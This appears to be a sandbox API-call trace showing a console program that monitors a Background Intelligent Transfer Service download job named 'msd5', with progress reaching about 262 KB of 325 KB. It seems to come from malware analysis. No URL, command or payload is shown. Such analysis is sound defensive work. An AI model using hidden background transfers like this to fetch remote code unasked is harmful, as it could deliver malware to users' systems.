[0079.506] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f8, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f8*=0x8) returned 1
[0079.506] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.506] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d4 | out: lpConsoleScreenBufferInfo=0x2ce0d4) returned 1
[0079.519] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2ce0ec, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0ec*=0xc) returned 1
[0079.524] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0e4 | out: lpConsoleScreenBufferInfo=0x2ce0e4) returned 1
[0079.525] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce0fc, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0fc*=0xa) returned 1
[0079.525] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.525] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0cc | out: lpConsoleScreenBufferInfo=0x2ce0cc) returned 1
[0079.526] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2ce0e4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0e4*=0xa) returned 1
[0079.526] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.526] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d4 | out: lpConsoleScreenBufferInfo=0x2ce0d4) returned 1
[0079.526] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0ec, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0ec*=0x8) returned 1
[0079.526] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.527] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce0f8 | out: _Buffer="0") returned 1
[0079.527] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce104 | out: _Buffer="1") returned 1
[0079.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0d4 | out: lpConsoleScreenBufferInfo=0x2ce0d4) returned 1
[0079.527] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2ce0ec, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0ec*=0x5) returned 1
[0079.527] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.527] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0dc | out: lpConsoleScreenBufferInfo=0x2ce0dc) returned 1
[0079.528] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce0f4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0f4*=0x8) returned 1
[0079.528] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.528] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce100 | out: _Buffer="0") returned 1
[0079.528] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce104 | out: _Buffer="325120") returned 6
[0079.528] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2ce100 | out: _Buffer="0") returned 1
[0079.528] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ce0ec | out: lpSystemTimeAsFileTime=0x2ce0ec*(dwLowDateTime=0xdffc5f30, dwHighDateTime=0x1d469c7))
[0079.528] _finite (_X=0x0) returned 1
[0079.528] _finite (_X=0x0) returned 1
[0079.528] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0ac | out: lpConsoleScreenBufferInfo=0x2ce0ac) returned 1
[0079.529] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x2ce0c4, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0c4*=0x11) returned 1
[0079.529] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.529] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0b8 | out: lpConsoleScreenBufferInfo=0x2ce0b8) returned 1
[0079.529] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x2ce0d0, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce0d0*=0xf) returned 1
[0079.530] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.530] _vsnwprintf (in: _Buffer=0x2cdee4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x2cdea8 | out: _Buffer="0.00 B/S") returned 8
[0079.530] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2ce0fc | out: lpConsoleScreenBufferInfo=0x2ce0fc) returned 1
[0079.530] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2ce114, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2ce114*=0x8) returned 1
[0079.530] CoTaskMemFree (pv=0x4383d8)
[0079.530] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fb9
[0079.531] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2cf1d0 | out: pVal=0x2cf1d0) returned 0x0
[0079.532] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0079.533] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2cf1cc | out: pVal=0x2cf1cc) returned 0x0
[0079.533] CoTaskMemFree (pv=0x0)
[0079.533] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2cf1e4 | out: pVal=0x2cf1e4*="msd5") returned 0x0
[0079.534] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf18c | out: lpConsoleScreenBufferInfo=0x2cf18c) returned 1
[0079.534] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2cf1a4 | out: lpNumberOfCharsWritten=0x2cf1a4) returned 1
[0079.535] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2cf1a4 | out: lpNumberOfAttrsWritten=0x2cf1a4) returned 1
[0079.535] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.535] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.535] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.536] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0xa) returned 1
[0079.536] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.536] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.536] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x5) returned 1
[0079.536] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.537] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0x7) returned 1
[0079.537] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.537] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf170 | out: lpConsoleScreenBufferInfo=0x2cf170) returned 1
[0079.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf188, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf188*=0x8) returned 1
[0079.538] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.538] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.538] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0x8) returned 1
[0079.538] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.539] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0xc) returned 1
[0079.539] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.539] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.539] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0xa) returned 1
[0079.540] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf164 | out: lpConsoleScreenBufferInfo=0x2cf164) returned 1
[0079.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf17c*=0xa) returned 1
[0079.540] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.540] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.540] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x8) returned 1
[0079.541] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.541] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf190 | out: _Buffer="0") returned 1
[0079.541] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf19c | out: _Buffer="1") returned 1
[0079.541] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.541] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x5) returned 1
[0079.541] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.541] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.541] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x8) returned 1
[0079.542] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.542] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf198 | out: _Buffer="0") returned 1
[0079.542] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf19c | out: _Buffer="325120") returned 6
[0079.542] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf198 | out: _Buffer="0") returned 1
[0079.542] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf184 | out: lpSystemTimeAsFileTime=0x2cf184*(dwLowDateTime=0xdffec090, dwHighDateTime=0x1d469c7))
[0079.542] _finite (_X=0x0) returned 1
[0079.542] _finite (_X=0x0) returned 1
[0079.542] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf144 | out: lpConsoleScreenBufferInfo=0x2cf144) returned 1
[0079.542] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x2cf15c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf15c*=0x11) returned 1
[0079.543] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.543] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf150 | out: lpConsoleScreenBufferInfo=0x2cf150) returned 1
[0079.543] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x2cf168, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf168*=0xf) returned 1
[0079.543] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.544] _vsnwprintf (in: _Buffer=0x2cef7c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x2cef40 | out: _Buffer="0.00 B/S") returned 8
[0079.544] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf194 | out: lpConsoleScreenBufferInfo=0x2cf194) returned 1
[0079.544] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf1ac, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf1ac*=0x8) returned 1
[0079.544] CoTaskMemFree (pv=0x4383d8)
[0079.545] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 0
[0079.545] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x2cfb30*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0079.914] PeekMessageW (in: lpMsg=0x2cfb08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2cfb08) returned 1
[0079.915] TranslateMessage (lpMsg=0x2cfb08) returned 0
[0079.915] DispatchMessageW (lpMsg=0x2cfb08) returned 0x1
[0079.915] IBackgroundCopyCallback:JobModification (This=0x440cc8, pJob=0x42a6e4, dwReserved=0x0) returned 0x0
[0079.915] IBackgroundCopyJob:GetState (in: This=0x42a654, pVal=0x440cd4 | out: pVal=0x440cd4) returned 0x0
[0079.915] KillTimer (hWnd=0x0, uIDEvent=0x7fb9) returned 1
[0079.916] IBackgroundCopyJob:GetType (in: This=0x42a654, pVal=0x2cf1d0 | out: pVal=0x2cf1d0) returned 0x0
[0079.916] IBackgroundCopyJob:GetProgress (in: This=0x42a654, pVal=0x440cd8 | out: pVal=0x440cd8) returned 0x0
[0079.917] IBackgroundCopyJob:GetPriority (in: This=0x42a654, pVal=0x2cf1cc | out: pVal=0x2cf1cc) returned 0x0
[0079.918] CoTaskMemFree (pv=0x0)
[0079.918] IBackgroundCopyJob:GetDisplayName (in: This=0x42a654, pVal=0x2cf1e4 | out: pVal=0x2cf1e4*="msd5") returned 0x0
[0079.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf18c | out: lpConsoleScreenBufferInfo=0x2cf18c) returned 1
[0079.919] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x2cf1a4 | out: lpNumberOfCharsWritten=0x2cf1a4) returned 1
[0079.920] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x2cf1a4 | out: lpNumberOfAttrsWritten=0x2cf1a4) returned 1
[0079.920] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0079.920] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.920] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.920] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0xa) returned 1
[0079.921] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.921] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x5) returned 1
[0079.921] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.922] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0x7) returned 1
[0079.922] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf170 | out: lpConsoleScreenBufferInfo=0x2cf170) returned 1
[0079.922] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf188, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf188*=0x8) returned 1
[0079.923] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.923] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf178 | out: lpConsoleScreenBufferInfo=0x2cf178) returned 1
[0079.923] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf190, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf190*=0x8) returned 1
[0079.923] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.924] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.924] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0xe) returned 1
[0079.924] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.924] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf17c | out: lpConsoleScreenBufferInfo=0x2cf17c) returned 1
[0079.924] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf194, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf194*=0xa) returned 1
[0079.925] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.925] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf164 | out: lpConsoleScreenBufferInfo=0x2cf164) returned 1
[0079.925] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x2cf17c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf17c*=0xa) returned 1
[0079.925] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x8) returned 1
[0079.926] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.926] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf190 | out: _Buffer="0") returned 1
[0079.926] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf19c | out: _Buffer="1") returned 1
[0079.926] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf16c | out: lpConsoleScreenBufferInfo=0x2cf16c) returned 1
[0079.926] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x2cf184, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf184*=0x5) returned 1
[0079.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.927] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf174 | out: lpConsoleScreenBufferInfo=0x2cf174) returned 1
[0079.927] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x2cf18c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf18c*=0x8) returned 1
[0079.927] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.928] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf198 | out: _Buffer="262144") returned 6
[0079.928] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf19c | out: _Buffer="325120") returned 6
[0079.928] _vsnwprintf (in: _Buffer=0x1f03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x2cf198 | out: _Buffer="80") returned 2
[0079.928] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cf184 | out: lpSystemTimeAsFileTime=0x2cf184*(dwLowDateTime=0xe03a42f0, dwHighDateTime=0x1d469c7))
[0079.928] _finite (_X=0x3bce48fa) returned 1
[0079.928] _finite (_X=0xed53ffc4) returned 1
[0079.928] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf144 | out: lpConsoleScreenBufferInfo=0x2cf144) returned 1
[0079.928] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x17, lpNumberOfCharsWritten=0x2cf15c, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf15c*=0x17) returned 1
[0079.928] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf150 | out: lpConsoleScreenBufferInfo=0x2cf150) returned 1
[0079.929] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x2cf168, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf168*=0xf) returned 1
[0079.929] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0079.929] _vsnwprintf (in: _Buffer=0x2cef7c, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x2cef40 | out: _Buffer="459.49 KB/S") returned 11
[0079.929] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf148 | out: lpConsoleScreenBufferInfo=0x2cf148) returned 1
[0079.930] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x2cf160, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf160*=0xc) returned 1
[0079.930] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0079.930] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cf150 | out: lpConsoleScreenBufferInfo=0x2cf150) returned 1
[0079.930] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x1e43c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x2cf168, lpReserved=0x0 | out: lpBuffer=0x1e43c4*, lpNumberOfCharsWritten=0x2cf168*=0x10) returned 1
